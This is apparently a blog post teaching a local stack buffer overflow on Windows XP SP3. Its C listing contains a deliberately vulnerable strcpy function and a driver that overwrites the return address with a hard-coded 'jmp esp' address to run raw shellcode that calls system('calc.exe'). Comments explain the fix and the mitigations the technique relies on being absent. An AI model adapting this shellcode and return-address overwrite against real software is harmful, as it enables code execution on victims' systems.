Stack Overflow (strcpy, Local)
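Target: Windows XP SP3. The absolute addresses hard-coded in the listing below are specific to that system.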
/*
 * func1 - deliberately vulnerable copy used to demonstrate a stack buffer
 * overflow.
 *
 * buf is 10 bytes and strcpy() copies from s until it reaches a NUL byte,
 * with no regard for the destination size. Any input of 10 or more
 * characters is therefore written past the end of buf into the rest of the
 * stack frame. According to the author's note in _tmain, the saved return
 * address sits 12 bytes past the start of buf in a release build and
 * 16 bytes in a debug build.
 *
 * Fix for real code: reject or truncate input that does not fit, e.g. check
 * strlen(s) < sizeof buf before copying, or use a size-taking API such as
 * strcpy_s(buf, sizeof buf, s) or snprintf(buf, sizeof buf, "%s", s).
 */
void func1(char* s)
{
    char buf[10];
    strcpy(buf, s);   /* unbounded copy: the defect this page demonstrates */
}

/*
 * _tmain - driver that feeds func1 an oversized buffer laid out to replace
 * its return address.
 *
 * Two variants appear here. The commented-out one patches bytes 12..15 of a
 * 16-character string with the address of a separate array, so the function
 * returns straight into that array. The active one is a single array:
 * 12 filler bytes, then a 4-byte address that lands on the return-address
 * slot, then the payload bytes.
 *
 * NOTE(review): this only works where the usual mitigations are absent.
 * Every address is a hard-coded absolute value, so it depends on modules
 * loading at fixed addresses (no ASLR, /DYNAMICBASE), on the stack being
 * executable (no DEP, /NXCOMPAT), and presumably on stack cookies (/GS)
 * being disabled. The page does not show the build settings, so confirm
 * them before drawing conclusions from this listing.
 */
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
    // Variant 1 (disabled by the author): return address points at a
    // separate payload array.
//    unsigned char uc[] =
//        "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"
//        "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
//        "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
//        "\xB8"
//        "\xC7\x93\xBF\x77"//system
//        "\xFF\xD0\x33\xC0\x50\xB8"
//        "\x7E\x9E\xC0\x77\xFF"//exit
//        "\xD0";
//    char ch[] = "0123456789123456";// length is an integer multiple of 4
//    DWORD* pEIP = (DWORD*)&ch[12];// return address slot: +12 release, +16 debug
//    *pEIP = (DWORD)uc;// return address points to the shellcode
//    func1(ch);

    // Variant 2 (active): filler + replacement return address + payload in
    // one array. The ASCII embedded in the payload bytes includes
    // "msvcrt.dll" and "calc.exe", so this looks like the common
    // launch-calculator proof of concept. Verify before relying on that.
    unsigned char uc[] =
        "123456789012\x53\x93\xD2\x77"   // 12 filler bytes, then 0x77D29353 (little-endian)
        "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"
        "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
        "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
        "\xB8"
        "\xC7\x93\xBF\x77"// author's label: address of system
        "\xFF\xD0\x33\xC0\x50\xB8"
        "\x7E\x9E\xC0\x77\xFF"// author's label: address of exit
        "\xD0";
    // Author's note: 0x77D29353 is a "jump esp" inside user32.dll, so that
    // DLL must be loaded before func1 runs.
    LoadLibrary("user32.dll");
    func1((char*)uc);   // overflow happens here; control does not return normally
    return 0;
}
posted on 2016-10-28 10:02 NoneButNow